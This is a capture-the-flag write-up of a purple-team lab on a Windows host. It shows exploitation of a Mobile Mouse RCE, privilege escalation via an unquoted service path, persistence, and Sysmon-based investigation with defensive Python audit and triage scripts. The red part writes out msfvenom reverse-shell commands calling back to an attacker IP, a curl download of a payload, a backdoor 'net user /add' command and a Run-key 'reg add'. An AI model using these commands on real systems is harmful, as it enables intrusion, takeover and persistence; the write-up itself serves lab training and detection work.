Mouse Trap

Follow Jom and Terry on their purple teaming adventures, emulating attacks and investigating the leftover artefacts. - by ar33zy, DrGonz0 & Aashir.Masood

Last updated 5 months ago

The following post by 0xb0b is licensed under CC BY 4.0.


Jom and Terry Go Purple

Follow the adventures of Jom and Terry, members of the TryMouseMe purple team, as they work through a thrilling exercise of Attack and Defense. From initial access to persistence, you will emulate a three-stage attack on a Windows environment.

Recon

We start with an Nmap scan of mousetrap.thm, which reveals several open ports on a Windows system. The host is running Microsoft services such as RPC (port 135), NetBIOS-SSN (port 139), and SMB (port 445). Remote Desktop Protocol (RDP) is available on port 3389. WinRM is accessible via Microsoft HTTPAPI on port 5985. Port 9099 is initially reported as unknown.

With a default script and service scan, we see that port 9099 is identified as a Mobile Mouse Server.

┌──(0xb0b㉿kali)-[~/Documents/tryhackme/mouse trap]
└─$ nmap -sT -sC -sV -p 135,139,445,3389,5985,7680,9099,9999,35913,47001,49664-49673 -Pn mousetrap.thm

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-15 14:08 EST
Nmap scan report for mousetrap.thm (10.10.58.135)
Host is up (0.038s latency).

PORT      STATE  SERVICE       VERSION
135/tcp   open   msrpc         Microsoft Windows RPC
139/tcp   open   netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open   microsoft-ds?
3389/tcp  open   ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: MOUSETRAP
|   NetBIOS_Domain_Name: MOUSETRAP
|   NetBIOS_Computer_Name: MOUSETRAP
|   DNS_Domain_Name: MOUSETRAP
|   DNS_Computer_Name: MOUSETRAP
|   Product_Version: 10.0.17763
|_  System_Time: 2024-11-15T19:10:02+00:00
| ssl-cert: Subject: commonName=MOUSETRAP
| Not valid before: 2024-07-03T16:07:31
|_Not valid after:  2025-01-02T16:07:31
|_ssl-date: 2024-11-15T19:10:45+00:00; -1m11s from scanner time.
5985/tcp  open   http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
7680/tcp  open   pando-pub?
9099/tcp  open   unknown
| fingerprint-strings: 
|   FourOhFourRequest, GetRequest: 
|     HTTP/1.0 200 OK 
|     Server: Mobile Mouse Server 
|     Content-Type: text/html 
|     Content-Length: 326
|_    <HTML><HEAD><TITLE>Success!</TITLE><meta name="viewport" content="width=device-width,user-scalable=no" /></HEAD><BODY BGCOLOR=#000000><br><br><p style="font:12pt arial,geneva,sans-serif; text-align:center; color:green; font-weight:bold;" >The server running on "MOUSETRAP" was able to receive your request.</p></BODY></HTML>
9999/tcp  open   abyss?
35913/tcp open   unknown
47001/tcp open   http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open   msrpc         Microsoft Windows RPC
49665/tcp open   msrpc         Microsoft Windows RPC
49666/tcp open   msrpc         Microsoft Windows RPC
49667/tcp open   msrpc         Microsoft Windows RPC
49668/tcp open   msrpc         Microsoft Windows RPC
49669/tcp open   msrpc         Microsoft Windows RPC
49670/tcp closed unknown
49671/tcp open   msrpc         Microsoft Windows RPC
49672/tcp closed unknown
49673/tcp open   msrpc         Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port9099-TCP:V=7.94SVN%I=7%D=11/15%Time=67379C49%P=x86_64-pc-linux-gnu%
SF:r(GetRequest,1A7,"HTTP/1\.0\x20200\x20OK\x20\r\nServer:\x20Mobile\x20Mo
SF:use\x20Server\x20\r\nContent-Type:\x20text/html\x20\r\nContent-Length:\
SF:x20326\r\n\r\n<HTML><HEAD><TITLE>Success!</TITLE><meta\x20name=\"viewpo
SF:rt\"\x20content=\"width=device-width,user-scalable=no\"\x20/></HEAD><BO
SF:DY\x20BGCOLOR=#000000><br><br><p\x20style=\"font:12pt\x20arial,geneva,s
SF:ans-serif;\x20text-align:center;\x20color:green;\x20font-weight:bold;\"
SF:\x20>The\x20server\x20running\x20on\x20\"MOUSETRAP\"\x20was\x20able\x20
SF:to\x20receive\x20your\x20request\.</p></BODY></HTML>\r\n")%r(FourOhFour
SF:Request,1A7,"HTTP/1\.0\x20200\x20OK\x20\r\nServer:\x20Mobile\x20Mouse\x
SF:20Server\x20\r\nContent-Type:\x20text/html\x20\r\nContent-Length:\x2032
SF:6\r\n\r\n<HTML><HEAD><TITLE>Success!</TITLE><meta\x20name=\"viewport\"\
SF:x20content=\"width=device-width,user-scalable=no\"\x20/></HEAD><BODY\x2
SF:0BGCOLOR=#000000><br><br><p\x20style=\"font:12pt\x20arial,geneva,sans-s
SF:erif;\x20text-align:center;\x20color:green;\x20font-weight:bold;\"\x20>
SF:The\x20server\x20running\x20on\x20\"MOUSETRAP\"\x20was\x20able\x20to\x2
SF:0receive\x20your\x20request\.</p></BODY></HTML>\r\n");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2024-11-15T19:10:05
|_  start_date: N/A
|_clock-skew: mean: -1m11s, deviation: 0s, median: -1m11s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 211.88 seconds

By visiting the index page, we see the info that the server is running on MOUSETRAP.

With a little research, we can find an exploit for CVE-2023-31902, published on GitHub as blue0x1/mobilemouse-exploit. The repository describes the issue as follows: Mobile Mouse 3.6.0.4 could allow a remote attacker to execute arbitrary code on the system, caused by improper input validation. By sending a specially crafted request, an attacker could exploit this vulnerability to execute arbitrary code on the system.

The exploit has two versions, one that uses SMB and one that uses HTTP. Both allow an attacker to execute arbitrary code on the target machine by sending a specially crafted request to the Mobile Mouse server.

Remote code execution

The room asks us to do the following to gain remote code execution:

  • Once you’ve found the CVE and exploit, use the version that uses SMB, not HTTP

  • Generate a Windows stageless reverse TCP (x64) shell

  • Ensure that your reverse shell is called shell.exe

We found an exploit targeting both SMB and HTTP. Now we need to generate a reverse shell called shell.exe, which we do with msfvenom.

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.14.90.235 LPORT=4445 -f exe > shell.exe

After we generated the shell, we set up a listener on 4445 and run the exploit:

python CVE-2023-31902-v2.py --target mousetrap.thm --file shell.exe --lhost 10.14.90.235

We get a connection back and we are purpletom.

In the users' directory of purpletom, we find the user flag.

Unquoted Service Path

The room now challenges us to abuse an unquoted service path to escalate privileges:

  • Use SharpUp.exe for enumeration, located in C:\Users\purpletom

  • Target the Mobile Mouse directory while executing the unquoted service path abuse

An Unquoted Service Path vulnerability occurs in Windows systems when a service's executable path contains spaces but is not enclosed in quotes. This misconfiguration can allow us to execute a malicious file placed in a higher-priority directory along the path, potentially escalating privileges.

We use SharpUp.exe as advised to find the vulnerability. The service runs HelperService.exe from an unquoted path below Mouse Utilities. So placing a Mouse.exe in the Mobile Mouse folder should cause Mouse.exe to be executed when the service starts.
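To make the search-order mechanism behind this finding concrete, here is an added Python example (not code from the room, from SharpUp or from the author) that reproduces the candidate executables Windows tries for an unquoted ImagePath and audits a list of services for the problem. The service list is constructed for the example; only the first entry follows the path layout described above.

```python
import re

# Constructed sample service definitions as (service name, ImagePath as it
# would be stored under HKLM\SYSTEM\CurrentControlSet\Services\<name>).
# Only the first entry mirrors the layout described in the writeup; the
# others are made up to exercise the quoted, no-space and variable cases.
SAMPLE_SERVICES = [
    ("Mobile Mouse Service",
     r"C:\Program Files (x86)\Mobile Mouse\Mouse Utilities\HelperService.exe"),
    ("Quoted Vendor Service", r'"C:\Program Files\Vendor App\svc.exe" -run'),
    ("Svchost Group", r"C:\Windows\System32\svchost.exe -k netsvcs"),
    ("Spooler", r"%SystemRoot%\System32\spoolsv.exe"),
]


def search_order(image_path):
    """Return the executables Windows would try, in order, when starting an
    unquoted ImagePath: every prefix that ends just before a space (with
    .exe appended) and finally the real binary. Quoted paths return []
    because the service controller passes them to CreateProcess unambiguously."""
    path = image_path.strip()
    if path.startswith('"'):
        return []
    # Treat everything up to the first ".exe" as the executable; what follows
    # (e.g. "-k netsvcs") are arguments and never take part in the search.
    m = re.search(r"\.exe", path, re.IGNORECASE)
    exe = path[:m.end()] if m else path
    candidates = [exe[:i] + ".exe" for i, ch in enumerate(exe) if ch == " "]
    candidates.append(exe)
    return candidates


def hijack_candidates(image_path):
    """Paths a planted file could occupy to be started instead of the real
    binary, i.e. every search-order entry except the real one."""
    order = search_order(image_path)
    return order[:-1] if len(order) > 1 else []


def find_unquoted(services):
    """Audit a list of (name, ImagePath) pairs; return the vulnerable ones
    together with the directories a defender must check for write access."""
    report = []
    for name, image_path in services:
        hijacks = hijack_candidates(image_path)
        if hijacks:
            dirs = sorted({p.rsplit("\\", 1)[0] for p in hijacks})
            report.append((name, hijacks, dirs))
    return report


if __name__ == "__main__":
    for name, hijacks, dirs in find_unquoted(SAMPLE_SERVICES):
        print(f"[!] {name}")
        for p in hijacks:
            print(f"    would be tried first: {p}")
        print(f"    check write access on: {', '.join(dirs)}")
```

For the Mobile Mouse entry the audit lists C:\Program Files (x86)\Mobile Mouse\Mouse.exe as the last candidate before the real binary, which is exactly the file the room has us plant; the fix is the write ACL on that folder and quoting the path (for example with sc config and a binPath= value wrapped in escaped quotes). On a live host the same input can be pulled with Get-CimInstance Win32_Service and its PathName property.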

Next, we create a suitable executable that will run when placed in the unquoted path and the service is run.

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.14.90.235 LPORT=4446 -f exe > mouse.exe

As a user, we are allowed to write to C:\Program Files (x86)\Mobile Mouse.

Next, we set up a python web server on our machine and use the PowerShell curl alias to download our crafted shell. We place it into C:\Program Files (x86)\Mobile Mouse.

curl http://10.14.90.235/mouse.exe -o mouse.exe

We list the available services via the following command:

wmic service list brief

There is the mobile mouse service:

Next, we set up a listener on port 4446. Via net start "Mobile Mouse Service" we run the service.

We get a connection back and are NT AUTHORITY\SYSTEM. On the Desktop of the Administrator user, we find the root flag.

Furthermore, we are able to spot some credentials for the admin user.

Registry run keys and local account creation

The next thing to do is to establish persistence by adding a run key named shell under Windows\CurrentVersion\Run with the value C:\Windows\Temp\shell.exe, and by adding a user terry.

  • Use the HKEY_CURRENT_USER registry hive

  • Use the SYSTEM user when creating the run key persistence

  • Specify the registry key name (shell)

  • Use the following path for the payload (C:\Windows\Temp\shell.exe)

  • Specify the name of the backdoor user (terry)

After running the following two commands, we can run checker.exe at C:\Users\Administrator\Desktop to reveal the final flag.

net user terry 12asdf$123 /add
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v shell /t REG_SZ /d "C:\Windows\Temp\shell.exe" /f

The procedure is prescribed this strictly so that the subsequent analysis can follow it step by step. Originally, the room did not use two machines. To keep it fair and to give everyone the same environment, there is now one machine for each part.

Time to Catch Terry

Now we switch to the blue side and try to understand what happened using the Sysmon event logs with SysmonView. We follow the steps shown in the room to export the Sysmon logs as XML and then import them into SysmonView.

What is the name of the payload that was shared?

The first question asks us the name of the payload that was shared. On the first page, we have a list of DLLs and executables. By clicking on each of them, we can determine the image path. The executable payload.exe looks a bit suspicious. After clicking on it, we can see that the image path is indeed a shared folder.

What is the IP attacker’s IP address?

We have identified that suspicious executable. The IP is already present in the image path.

For the following questions, we will follow the steps below: Clicking on the image path displays a session. By clicking on it, we can see an event graph. Each event can be inspected.

Clicking on Process Create reveals the same info for the second question.

What is the full command-line of the executed payload?

As we have already shown above, we inspect the Process Create event. Here we see the command line issued.

What is the full command-line of the tool used to enumerate the privilege escalation vectors?

Besides the event graphs, we can also use the View All Events tab. Since we know from the red part that we had to use SharpUp.exe, we can find the full command line of the tool there.

When was this tool executed?

At the same entry, we are able to locate the time the tool was executed. However, this might be wrong: the actual time of execution was a bit earlier.

What command was used to transfer the reverse shell binary into the system?

Since we already know the IP of the attacker, we can search for this in All Events View. There we will find the command used to transfer the reverse shell.

What is the full command line value of the process created during the unquoted service path abuse?

As we know from the attack, we are looking for something like Mouse.exe. We use the View All Events tab again, drag the GUID column into the grouping field (2) and search for Mouse.exe. Several sessions are now available; of interest are those around the time of the attack (8/6/2024 4:20). We find a session pointing to cmd.exe. By clicking the entries below, (4) and (5), we see an event graph. Clicking on the Process Create event shows the parent command line, which contains the path of HelperService.exe.

What was the password set for the user created by the attacker for persistence

The next question asks us about the password set for the user created by an attacker. We could go through all the sessions around the time of the attack to find the password, but we could also go back to the Process View tab. Here we look for net.exe, which can be used to add new users. Here we find a session where a user was created around the time of the attack.

What is the key name used for persistence?

As with the user, we could now go through all sessions in the View All Event tab at the time of the attack. However, we can also explicitly search for reg.exe in the Process View tab. There we will find a session revealing us the key and the target path used by the attacker.

What is the target path of the persistence implant by the attacker?

This is the same reg.exe session as in the previous question: the Process View tab shows both the key name and the target path of the implant.
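The clicking through SysmonView described above can also be scripted. The following Python example is added here and is not part of the room or the author's writeup; it parses an exported Sysmon XML log, keeps only ProcessCreate (EventID 1) records, narrows them to the attack window and flags the three artefacts from the red part: a payload started from a network share, a local account created with net user /add, and a Run key written with reg add. The XML sample is constructed (the share IP 192.0.2.10, GUIDs and timestamps are invented); the command lines mirror the persistence commands above. An Event Viewer export may lack a root element, so the sample wraps the records in <Events>.

```python
import re
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# Constructed sample log: five Sysmon records in the XML layout Event Viewer
# writes, wrapped in a root element so they parse as one document.
SAMPLE_XML = r"""<Events>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
 <System><Provider Name="Microsoft-Windows-Sysmon"/><EventID>1</EventID><Computer>MOUSETRAP</Computer></System>
 <EventData><Data Name="UtcTime">2024-08-06 04:18:40.101</Data>
  <Data Name="ProcessGuid">{11111111-0000-0000-0000-000000000001}</Data>
  <Data Name="Image">\\192.0.2.10\share\payload.exe</Data>
  <Data Name="CommandLine">\\192.0.2.10\share\payload.exe</Data>
  <Data Name="ParentImage">C:\Windows\System32\cmd.exe</Data></EventData>
</Event>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
 <System><Provider Name="Microsoft-Windows-Sysmon"/><EventID>3</EventID><Computer>MOUSETRAP</Computer></System>
 <EventData><Data Name="UtcTime">2024-08-06 04:18:41.000</Data>
  <Data Name="Image">\\192.0.2.10\share\payload.exe</Data>
  <Data Name="DestinationIp">192.0.2.10</Data></EventData>
</Event>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
 <System><Provider Name="Microsoft-Windows-Sysmon"/><EventID>1</EventID><Computer>MOUSETRAP</Computer></System>
 <EventData><Data Name="UtcTime">2024-08-06 04:20:05.500</Data>
  <Data Name="Image">C:\Windows\System32\net.exe</Data>
  <Data Name="CommandLine">net user terry 12asdf$123 /add</Data>
  <Data Name="ParentImage">C:\Windows\System32\cmd.exe</Data></EventData>
</Event>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
 <System><Provider Name="Microsoft-Windows-Sysmon"/><EventID>1</EventID><Computer>MOUSETRAP</Computer></System>
 <EventData><Data Name="UtcTime">2024-08-06 04:20:30.250</Data>
  <Data Name="Image">C:\Windows\System32\reg.exe</Data>
  <Data Name="CommandLine">reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v shell /t REG_SZ /d "C:\Windows\Temp\shell.exe" /f</Data>
  <Data Name="ParentImage">C:\Windows\System32\cmd.exe</Data></EventData>
</Event>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
 <System><Provider Name="Microsoft-Windows-Sysmon"/><EventID>1</EventID><Computer>MOUSETRAP</Computer></System>
 <EventData><Data Name="UtcTime">2024-08-06 03:00:00.000</Data>
  <Data Name="Image">C:\Windows\System32\svchost.exe</Data>
  <Data Name="CommandLine">C:\Windows\System32\svchost.exe -k netsvcs</Data>
  <Data Name="ParentImage">C:\Windows\System32\services.exe</Data></EventData>
</Event>
</Events>"""


def parse_process_creates(xml_text):
    """Return the EventData of every Sysmon ProcessCreate (EventID 1) record
    as a dict keyed by the Data Name attribute; other event types are skipped."""
    events = []
    for ev in ET.fromstring(xml_text).findall("e:Event", NS):
        if ev.findtext("e:System/e:EventID", namespaces=NS) != "1":
            continue
        events.append({d.get("Name"): (d.text or "")
                       for d in ev.findall("e:EventData/e:Data", NS)})
    return events


def within(events, start, end):
    """Keep events whose UtcTime lies in [start, end]; Sysmon's
    'YYYY-MM-DD HH:MM:SS.mmm' format sorts correctly as a plain string."""
    return [e for e in events if start <= e.get("UtcTime", "") <= end]


RUN_KEY = re.compile(r"\\CurrentVersion\\Run\b", re.IGNORECASE)
NET_USER_ADD = re.compile(r"net1?\s+user\s+(\S+)\s+(\S+)\s+/add", re.IGNORECASE)


def net_user_details(cmd):
    """(username, password) from a 'net user <u> <p> /add' command line, else None."""
    m = NET_USER_ADD.search(cmd)
    return (m.group(1), m.group(2)) if m else None


def reg_add_details(cmd):
    """(value name, data) from a 'reg add ... /v <name> ... /d <data>' line, else None."""
    v = re.search(r"/v\s+(\S+)", cmd, re.IGNORECASE)
    d = re.search(r'/d\s+"([^"]*)"|/d\s+(\S+)', cmd, re.IGNORECASE)
    return (v.group(1), d.group(1) or d.group(2)) if v and d else None


def triage(events):
    """Flag the three artefacts of this attack chain as (kind, UtcTime, detail)."""
    findings = []
    for e in events:
        image, cmd, when = e.get("Image", ""), e.get("CommandLine", ""), e.get("UtcTime", "")
        low = image.lower()
        if image.startswith("\\\\"):  # UNC path: binary launched from a share
            findings.append(("payload from network share", when, image))
        if low.endswith(("\\net.exe", "\\net1.exe")) and net_user_details(cmd):
            findings.append(("local account creation", when, net_user_details(cmd)))
        if low.endswith("\\reg.exe") and RUN_KEY.search(cmd) and reg_add_details(cmd):
            findings.append(("run key persistence", when, reg_add_details(cmd)))
    return findings


if __name__ == "__main__":
    window = within(parse_process_creates(SAMPLE_XML), "2024-08-06 04:00:00", "2024-08-06 05:00:00")
    for kind, when, detail in triage(window):
        print(f"{when}  {kind}: {detail}")
```

On a real export, replace SAMPLE_XML with the file contents and widen or narrow the time window to the attack; the share finding answers the payload and attacker IP questions, the net.exe finding yields the backdoor user and password, and the reg.exe finding yields the key name and target path.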
